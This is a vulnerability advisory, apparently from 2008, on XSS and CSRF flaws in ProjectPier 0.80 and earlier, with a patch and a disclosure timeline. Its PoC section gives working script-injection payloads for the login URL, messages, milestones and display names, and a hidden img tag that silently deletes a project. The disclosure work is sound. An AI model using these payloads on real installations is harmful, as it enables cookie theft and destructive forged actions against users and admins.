======================================================================
ProjectPier <= 0.80 Cross Site Scripting and Request Forgery
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Cross Site Request Forgery
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: ProjectPier
Version: <= 0.80
Vendor: http://www.projectpier.org
Description:
ProjectPier is a Free, Open-Source, self-hosted PHP application for
managing tasks, projects and teams through an intuitive web interface.
ProjectPier will help your organization communicate, collaborate and
get things done Its function is similar to commercial
groupware/project management products, but allows the freedom and
scalability of self-hosting. Even better, it will always be free.
--------------
Vulnerability:
--------------
1. The login page is vulnerable to cross site scripting.
2. script code can be embedded into messages.
3. script code can be embedded into milestones.
4. script code can be embedded into a users display name.
5. The application is vulnerable to cross site request forgery.
A project e.g. can be deleted with a simple GET request (see PoC).
Combined with the XSS vulnerabilies, the code can be embedded into
a message - if an admin views it, the browser will send the request
to delete a project without being visible to the admin.
------------
PoC/Exploit:
------------
1.
http://localhost/projectpier/index.php?c=access"><script>alert('xss')</s
cript>&a=login"><script>alert(document.cookie)</script>
2.
create a message with <script>alert(document.cookie)</script>
3.
create a milestone with <script>alert(document.cookie)</script>
4.
set the display name in the profile to <script>alert(document.cookie)</script>
5.
<img src="http://localhost/projectpier/index.php?c=project&a=delete&id=1&acti
ve_project=1"
width="0" height="0">
---------
Solution:
---------
update to version 0.8.0.1 or above.
---------
Timeline:
---------
2007-10-24 - vendor informed
2007-10-24 - vendor responded
2008-02-13 - vendor released new version
2008-02-17 - public disclosure